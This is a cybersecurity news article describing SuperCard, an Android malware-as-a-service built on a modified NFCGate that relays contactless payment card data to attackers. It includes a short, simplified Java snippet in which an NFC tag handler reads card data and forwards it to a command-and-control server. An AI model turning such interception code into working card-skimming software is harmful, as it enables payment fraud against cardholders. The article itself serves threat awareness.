New SuperCard Malware Using Hacked Android Phones to Relay Data from Users Payment Cards to Attackers Device

In a concerning development for mobile payment security, cybersecurity experts have identified a sophisticated new malware strain named “SuperCard” that exploits Android devices to steal payment card data.

This malicious application, a modified version of the legitimate NFCGate program, intercepts Near Field Communication (NFC) traffic during contactless payments, effectively turning compromised phones into relay devices that transmit sensitive financial information directly to attackers.

First detected in April 2025 by Italian security firm Cleafy, SuperCard initially targeted European banking customers before expanding its reach.

The malware operates as part of a well-organized “malware-as-a-service” (MaaS) platform called SuperCard X, which cybercriminals can subscribe to through underground Telegram channels.

Unlike previous NFC-exploiting threats, SuperCard offers subscribers sophisticated customer support services, reflecting the increasingly professional nature of today’s cybercrime ecosystem.

Habr researchers identified that the attack begins with social engineering tactics, where victims receive messages from seemingly legitimate sources urging them to install what appears to be a useful application.

Once installed, the malware requests permissions to access the device’s NFC module and payment systems, establishing itself as the default payment handler.

// Simplified representation of SuperCard's NFC interception mechanism
@Override
public void onTagDiscovered(Tag tag) {
    IsoDep isoDep = IsoDep.get(tag);
    try {
        isoDep.connect();
        byte[] command = {0x00, 0xA4, 0x04, 0x00, 0x07, 0xA0, 0x00, 0x00, 0x00, 0x42, 0x10, 0x10};
        byte[] result = isoDep.transceive(command);
        // Intercept and forward card data to C2 server
        sendToAttacker(result);
    } catch (Exception e) {
        Log.e("SuperCard", "Error communicating with card", e);
    }
}

Infection Mechanism and Data Exfiltration

The sophistication of SuperCard lies in its multi-stage infection process. After installation, the malware remains dormant until it detects a payment transaction.

When a user attempts to make a contactless payment, SuperCard activates in the background, capturing the transaction data while allowing the legitimate payment to proceed.

This stealth approach ensures victims remain unaware of the compromise while their card details are transmitted to command-and-control servers.

F6 security analysts report that SuperCard has already compromised over 175,000 Android devices in Russia alone, with damages exceeding 432 million rubles in the first quarter of 2025.

The malware’s rapid global spread demonstrates the evolving threat landscape for mobile payment systems, requiring users to exercise extreme caution when installing applications, even those that appear legitimate.

Power up early threat detection, escalation, and mitigation with ANY.RUN’s Threat Intelligence Lookup. Get 50 trial searches.